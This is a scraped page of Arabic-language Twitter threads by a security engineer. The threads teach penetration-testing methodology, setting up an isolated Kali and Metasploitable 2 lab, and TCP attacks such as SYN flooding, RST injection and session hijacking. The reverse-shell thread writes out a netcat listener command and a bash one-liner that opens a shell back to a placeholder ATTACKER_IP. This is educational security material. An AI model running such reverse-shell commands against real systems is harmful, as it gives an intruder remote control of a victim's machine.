لمؤسسة أو جهة معينة. ✅ ما الفائدة من منهجيات اختبار الاختراق؟ Why? 🔺تم تصميم هذه المنهجيات بهدف محاكاة هجمات من جهات خارجية "أو داخلية" ضارة، مما يسمح للمؤسسات بفهم نقاظ الضعف لديها وحل مشاكلها قبل أن يستغلها مهاجم فعلي "Hacker". ✅ مراحل منهجية اختبار الاختراق: Phases 🔺 تختلف المراحل باختلاف المنهجية المستخدمة ، ولكن تتضمن المنهجية عادةً عدة مراحل و منها: التخطيط ، الاستطلاع وجمع المعلومات، و تقييم الضعف، واستغلال الثغرات، وما بعد الاستغلال ، واخيرًا اعداد و كتابة التقارير للاختبار المنفذ. 🔺كل مرحلة من هذه المراحل تحتوي على العديد من المهام التي يتم تنفيذها اما بشكل يدوي أو من خلال استخدام بعض الأدوات والبرمجيات المخصصة كما سنرى لاحقًا. 🔺 يجب الإشارة أيضًا الى أن كل مرحلة مصممة لتقليد الخطوات التي قد يقوم بها الهاكرز ولكن تتم بطريقة قانونية و خاضعة للرقابة بهدف تحسين الأمان.

IT676's tweet photo. #الأمن_السيبراني
#اختبار_الاختراق

📝 في هذا الثريد سنتكلم بشكل أكاديمي عن منهجيات "طرق" اختبار الاختراق وأشهرها.

📌 بدايةً، ما هو اختبار الاختراق؟
What's Penetration Testing ?
- هو عملية ممارسة اختبار لشبكة معينة أو نظام معين أو تطبيق معين بهدف ايجاد نقاط الضعف الأمنية التي يمكن للمهاجمين استغلالها والاضرار بهذه الشبكات، النظم أو التطبيقات.

- اختبار الاختراق يمكن أن يتم بشكل يدوي أو باستخدام أدوات تلقائية.

-اختبار الاختراق يمكن أن يتم من داخليًا " من داخل المؤسسة المراد اختبارها" حيث يمكن اعطاء بعض الصلاحيات والوصول للمختبرين ، ويمكن أن يتم بالكامل خارجيًا "من خارج المؤسسة " دون إعطاء أي صلاحيات و وصول للمختبرين، بحيث يتم محاكاة واقعية لهجمات خارجية يقوم بتنفيذها الهاكرز من الخارج.

- اختبار الاختراق يتبع طريقة محددة وممنهجة.
Penetration Testing Methodology

✅ ماهي منهجيات اختبار الاختراق؟
Penetration Testing Methodologies

🔺 هي عبارة عن مصطلح يشير إلى طريقة ونهج منظم يتبع مراحل محددة يستخدم بين متخصصي الأمن السيبراني لتحديد وتقييم واستغلال نقاط الضعف داخل شبكة معينة، أو نظام معين ، أو تطبيق معين لمؤسسة أو جهة معينة.

✅ ما الفائدة من منهجيات اختبار الاختراق؟
Why?
🔺تم تصميم هذه المنهجيات بهدف محاكاة هجمات من جهات خارجية "أو داخلية" ضارة، مما يسمح للمؤسسات بفهم نقاظ الضعف لديها وحل مشاكلها قبل أن يستغلها مهاجم فعلي "Hacker".

✅ مراحل منهجية اختبار الاختراق:
Phases
🔺 تختلف المراحل باختلاف المنهجية المستخدمة ، ولكن تتضمن المنهجية عادةً عدة مراحل و منها: التخطيط ، الاستطلاع وجمع المعلومات، و تقييم الضعف، واستغلال الثغرات، وما بعد الاستغلال ، واخيرًا اعداد و كتابة التقارير للاختبار المنفذ.

🔺كل مرحلة من هذه المراحل تحتوي على العديد من المهام التي يتم تنفيذها اما بشكل يدوي أو من خلال استخدام بعض الأدوات والبرمجيات المخصصة كما سنرى لاحقًا.

🔺 يجب الإشارة أيضًا الى أن كل مرحلة مصممة لتقليد الخطوات التي قد يقوم بها الهاكرز ولكن تتم بطريقة قانونية و خاضعة للرقابة بهدف تحسين الأمان.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#اختبار_الاختراق #الامن_السيبراني إنشاء مختبر للأمن السيبراني + اختبار الاختراق. ✅ Setting up a CyberSecurity Virtual Lab 🔺 لما تدرس أمن سيبراني أو حاب تسوي اختبار اختراق من الأفضل يكون عندك لاب مجهز و في بيئة اختبار منعزلة و آمنة. 📝 ليش نحتاج نسوي لاب؟ 1. ممارسة الأمن السيبراني واختبار الاختراق بطريقة آمنة 2. التطبيق على عمليات الاختراق واستغلال الثغرات "مناسب للمبتدئين" 3. تحليل واختبار البرمجيات الخبيثة في بيئة آمنة. 4. الأبحاث الأكاديمية حول السايبر سكيورتي. وغيرها… 💻 في هذا الثريد بتكلم عن طريقة انشاء لاب لاختبار الاختراق+ بعض الأنظمة المخصصة للاختبار اللي تقدر تشتغل عليها. 🔺 عدد و أنواع الأنظمة: 1. عدد الأنظمة اللي تحتاجها يعتمد على متطلباتك،،بمعنى ممكن يكون عندك لاب فيه نظامين ، أو ثلاثة أنظمة أو حتى عشرة ،،بتكون هذي النظم مرتبطة بشبكة معينة تحاكي شبكة بالواقع،،، كمبتدئ يفضل تبدأ بنظامين الى ثلاثة ،،،بحيث اثنين يمثلون نظم الضحية ، والثالث يمثل الهاكر/الأتاكر/مختبر الاختراق.. 2. أنواع الأنظمة كذلك يعتمد على النظم اللي أنت راح تحتاج تختبر ضدها والثغرات المتاحة بتطبيقات هذي النـظم وعلى هدفك الأساسي من اللاب،،،ممكن يكون عندك نظام windows باصداراته المختلفة ،،ممكن اوبنتو لنكس Ubuntu Linux ، كالي، وندوز سرفر أو غيره… 🔺 المواصفات الأقل و الواجب توفرها في اللابتوب أو الجهاز اللي بتسوي عليه اللاب RAM: 8 GB Processor : i7 HardDisk 500 GB SSD 📌 طبعًا كل ما كان لاب الأمن تبعك أكبر وفيه أنظمة أكبر بتحتاج جهاز بمواصفات أعلى. كذلك حاول تطفي النظم اللي ما تحتاجها هذيك اللحظة Virtual Machinces 📌 حل اخر مطروح اذا ماكان عندك لابتوب بمواصفات عالية هو استخدام الكلاود،، لكن غير مناسب للمبتدئين. 🔴 ملاحظة: أنا من محبين MacBook Pro وللأبد أعمل من خلاله ولكن ابتعد عن شراء أجهزة ماك بمعالجات أبل الجديدة M1-M2-M3 لعدم توفر البرامج لها خصوصا لما تحتاج برامج خاصة،،، نحتاج تنتظر وقت حتى تصير متاحة كافة البرامج. كالي لنكس + ميتاسبلويتبل متوفرة لهذا النظام ولكن بعض البرامج الخاصة لا أنا مستخدم MacBook Pro ولكن معالج انتل وليس أبل. 🔺 البرامج الشائعة لإنشاء اللاب: -Oracle Virtual Box: Free and Open Source - VMware Player or VMware Workstation :Free and Paid 🔺 أفضل و أبسط لاب للمبتدئين "برأيي" : -Metasploitable 2 -Kali Linux 📌 Metasploitable هو نظام وبيئة مخصصة لاختبار الاختراق،،تم وضع الكثير من الثغرات في هذا النظام عن قصد وبعمد بهدف التطبيق على أشهر الثغرات،،مناسب جدًا للمبتدئين لممارسة اختبار الاختراق عن طريق التطبيق الفعلي للهجمات. 🚨 ملاحظة هامة: يجب عدم السماح لهذا النظام بقبول اتصالات من خارج الشبكة لأن من السهل اختراقك من خلال هذا النظام. الحل الصحيح : من اعدادات الشبكة في Virtual Box or VMware اختار Host-Only بحيث أنه بيسوي شبكة خاصة مع الهوست،، بالتالي يعتبر أكثر أمانًا. https://t.co/slgB5omigh في هذي الصفحة بتحصلون روابط لتنزيل ملف النظام + اسم المستخدم وكلمة المرور للدخول لهذا النظام بعد تثبيته. نوع النظام: اوبنتو لنكس https://t.co/cfyqAfA6uW وفي هذي الصفحة بتحصلون دليل ارشادي لاستغلال الثغرات المتوفرة فيه وكيفية تطبيقها. ان شاء الله في تغريدة فيما بعد بنزل طريقة الست أب لهذا اللاب. وبالتوفيق لكم.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

✅🏴‍☠️Reverse Shell Using TCP Session Hijacking في التغريدات السابقة تكلمنا عن هجوم اختطاف جلسة TCP وتنفيذ أوامر ضارة على السرفر… 🔺 التكنيك السابق يكون مناسب في حالة كنا مهتمين بحقن وتنفيذ أمر واحد على السرفر ،، ولكن في حالة تنفيذ عدة أوامر يعتبر هذا الاسلوب غير عملي، لأن بكل مره تحتاج تختطف الجلسة وتنفذ أمر معين،، ف يعتبر اسلوب غير عملي… 📌 الهاكرز عادةً يحتاجون ينفذون عدة أوامر وليس أمر واحد فقط،،،ولتحقيق هالشيء فأفضل طريقة لتنفيذه هي تشغيل برنامج شل Shell Program-bash 🤔 ممكن بتقول أوك الموضوع بسيط،، بدال ما أني اكتب أمر لانشاء ملف أو تنزيل صورة من النت "زي ما شفنا بالفيديو السابق" راح اشغل برنامج الشل /bin bash بالتالي البرنامج بيشتغل وبيتنفذ،،،،،هذا الكلام صحيح ،، اذا نفذت هذا الأمر بيشتغل البرنامج على جهاز السرفر "الضحية".. 📌 بس المشكلة وين؟? 🔴 المشكلة في الانبوت لهذا البرنامج،،،بياخذها من نفس السرفر وكذلك الاوتبوت بياخذه من نفس السرفر ،، بمعنى ما استفدنا ولا شيء لأن اساسا ماعندنا وصول لبرنامج الباش نفسه ع السرفر عشان نعطيه الانبوت "الاوامر " اللي نبي ينفذها وبنفس الوقت مانقدر نشوف المخرجات لأن اساسا قاعده تنطبع ع السرفر نفسه مب جهاز الأتاكر.. 🔺 ف ياه نفس ماقلنا نقدر نحقن الأمر وبيشتغل وكل شيء تمام بس ماراح نقدر نكتب أوامر ونشوف النتائج لأنه قاعد يشتغل ع السرفر و لأننا ببساطة مب قدام الجهاز نفسه،،فما عندنا أي كنترول ع هالشيء فما يهم فعليا شغلت البرنامج ولا لا لأن ماراح تستفيد منه بهذي الطريقة.. 🔺 السؤال ،،كيف نحل هذي المشكلة،،،بمعنى كيف نشغل برنامج الشل bash ويصير ياخذ الانبوت "الاوامر" منا وبنفس الوقت اذا بيطبع شيء ينطبع ع جهازنا "كمهاجمين" بدال ما ينطبع على جهاز الضحية"السرفر". 📝 نحتاج الى طريقة بحيث ان الانبوت والاوتبوت للبرنامج هذا نعيد توجيهها i/o redirection بحيث تجي وتروح لجهاز المهاجم،، يعني نحتاج نعكس reverse الطريقة التقليدية لاخذ المدخلات والمخرجات باعادة توجيهها لجهاز اخر ✅ هذي هي الفكرة الرئيسية و باختصار لما يسمى ب Reverse Shell وهو الهجوم اللي راح ننفذ هذي المرة ،، عملية فهم مبدأ وعمل Reverse Shell بعمق وبشكل كبير يتطلب منك معرفة متوسطة بأساسيات عمل النظام زي مثلا file descriptor , standard I/O redirection وغيرها ولكن هذي المفاهيم الأساسية خارج سكوب هذا الموضوع كوننا نتكلم عن سايبر أتاكس ولأن بيطول الكلام أكثر من كذا لو بنتكلم عنها ولكن بحاول اذا جينا للأوامر أعلق عليها بشكل مختصر.. 📝 خلونا نرتب الأفكار: أولا: اختطاف جلسة TCP مناسبة عند الرغبة بتنفيذ أمر واحد فقط،، ثانيا: الهاكرز يبحثون عن طريقة تمنكهم من اعطاء عدة أوامر وليس أمر واحد فقط. ثالثا: احد الطرق الممكنة لتنفيذ هذا الشيء هو ما يسمى ب Reverse Shell رابعا: : Reverse Shell هو عبارة عن أسلوب شائع يستخدم في السايبر "سواءً لأغراض مشروعة أو ضارة"، بحيث يسمح لطرف خارج"المهاجم" ببدء برنامج command shell على جهاز اخر"الضحية"،، بالتالي منح هذا الطرف "المهاجم "تحكم كامل على هذا الجهاز"الضحية". بالعادة في shell التقليدي أو العادي ،، العميل يتصل بالسرفر ويعطيه الأوامر لتنفيذها،، هنا بيصير العكس تماما عشان كذا نسميه Reverse shell وهو أن السرفر يسوي اتصال عكسي لجهاز المهاجم ونسوي اعادة توجيه للمدخلات والمخرجات الى جهاز المهاجم. كيف يعمل Reverse Shell؟ How Reverse Shell Works? ✅1.Listner Setup : في هذي الخطوة المهاجم يقوم بتجهيز "مستمع Listener " على جهازه عشان يستقبل الاتصالات ،، هالشيء يتم بعدة طرق و أدوات من أشهرها طبعًا nectat اللي بنسويه هنا كماهجمين،،،نفتح اتصال nectat على port معين مثلا 4444 او 9090 او غيره ونصير ننتظر الاتصالات اللي بتجي. ليه احتجنا هالشيء؟ لأن باختصار قلنا في البداية ان السرفر "الضحية "بيعكس الاتصال وبيوديه لجهاز اخر،،،هنا احنا فتحنا مستمع عشان اذا جاء الاتصال من السرفر نستقبله وبكذا صار متصل فينا ونقدر نعطيه الاوامر اللي نبي ونشوف المخرجات. هذا الامر اللي بنحتاجه nc -lvnp 4444 or nc -l -p 9090 ✅2. Execution على جهاز الضحية نحقن الأمر لتشغيل برنامج الشل طبعا احنا بنختطف جلسة TCP ونحقن الأمر اللي بيشغل برنامج الشل على السرفر زي مثلا: bash -i >& /dev/tcp/ATTACKER_IP/9090 0>&1 هنا قاعدين نقوله: شغل برنامج الشل، وسويلي اعادة توجيه للانبوت والاوتبوت الى عنوان ip المعطى على البورت port المعطى ✅3. Command Execution الى هذي اللحظة ومن خلال الاتصال اللي تم انشاءه صار المهاجم عنده تحكم كامل على السرفر ، بمعنى الحين يقدر ينفذ أي اوامر يبيها وكأنه امام السرفر حرفيًا. "يعتمد على مستوى الوصول لبرنامج الشل اللي اشتغل ومدى الصلاحيات الممنوحه له ولكن نقدر نرقيها في حالة احتجنا بأساليب اخرى خارج سكوب الموضوع ذا"

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#أمن_الشبكات #اختبار_الاختراق في هذا الثريد راح أتكلم عن 4 هجمات متعلقة ب بروتوكول TCP + التطبيق عليها. النظم المستخدمة 💻 : Ubuntu 22.04: Server and Client. Kali Linux 2023.4: PenTester or Attacker. الهجمات 🏴‍☠️ : ✅TCP SYN Flooding Attack. ✅TCP RST Attacks on telnet and ssh Connections. ✅TCP Session Hijacking. ✅Reverse Shell using TCP Session Hijacking.

11K

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

ENG.NAIF ALSHEHRI #أمن_التطبيقات #أمن_الشبكات #اختبار_الاختراق 🏴‍☠️ HTTP Session Hijacking Attack. هذا الأتاك يتبع نفس مبدأ اختطاف جلسة TCP ولكن على مستوى أعلى كونه يتعامل مع بروتوكول http بدون تفاصيل الرقم التسلسلي وغيرها.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users